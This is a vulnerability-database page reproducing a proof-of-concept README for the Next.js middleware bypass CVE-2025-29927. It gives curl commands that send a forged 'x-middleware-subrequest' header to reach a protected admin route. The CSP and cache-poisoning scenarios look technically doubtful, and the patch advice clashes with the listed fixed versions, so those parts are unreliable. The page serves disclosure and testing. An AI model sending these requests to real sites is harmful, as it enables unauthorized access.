漏洞平台

POC详情： 73eea93de8517aa563115e468b62c51016be11e4

来源

https://github.com/Eve-SatOrU/POC-CVE-2025-29927

关联漏洞

标题： Next.js 安全漏洞 (CVE-2025-29927)
描述：Next.js是Vercel开源的一个 React 框架。 Next.js 14.2.25之前版本和15.2.3之前版本存在安全漏洞，该漏洞源于如果授权检查发生在中间件中，可能绕过授权检查。

描述

CVE-2025-29927 Proof of Concept

介绍

# CVE-2025-29927: Next.js Middleware Bypass PoC
## Overview
This PoC demonstrates CVE-2025-29927, a vulnerability in Next.js middleware that allows attackers to bypass authentication, authorization, and CSP mechanisms using the x-middleware-subrequest header.

## Affected Versions
Next.js versions 11.1.4 to 15.1.7

## Setup & Installation
1️⃣ Clone & Install the PoC
```sh
git clone https://github.com/Eve-SatOrU/POC-CVE-2025-29927.git
cd POC-CVE-2025-29927
cd Demo 
cd my-next-app
npm install
npm run dev
```

The app will start on http://localhost:3000

## Exploitation Scenarios
### 1️⃣ Bypass Authentication & Authorization (cURL)
1- Use x-middleware-subrequest to gain unauthorized access:

```sh
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin
```
💥 Expected result: The response returns admin admin, even though authentication was bypassed.

<!-- put screenshot.png -->
![result screenshot](assets/Screenshot.png)

### 2️⃣ CSP Bypass for XSS Injection
If CSP is enforced via middleware, bypass it:

```sh
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
     -H "Content-Security-Policy: default-src 'self'" \
     http://localhost:3000/admin
```
💥 Expected result: The CSP is ignored, allowing malicious script execution.

### 3️⃣ Cache-Poisoning DoS (CPDoS) Attack
Exploit cache poisoning by forcing a malformed response:

```sh
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
     -H "Cache-Control: public, max-age=3600" \
     http://localhost:3000/admin
```
💥 Expected result: The page is cached with incorrect content, disrupting normal users.

## Mitigation Strategies
- ✅ Validate middleware logic to prevent bypass . 
- ✅ Upgrade Next.js once a patched version is released .

## Credits
🔍 Discovered by: Allam Rachid (zhero;) & Allam Yasser (inzo_)

文件快照


 [4.0K]  /data/pocs/73eea93de8517aa563115e468b62c51016be11e4
├── [4.0K]  assets
│   └── [109K]  Screenshot.png
├── [4.0K]  Demo
│   └── [4.0K]  my-next-app
└── [1.9K]  README.md

3 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。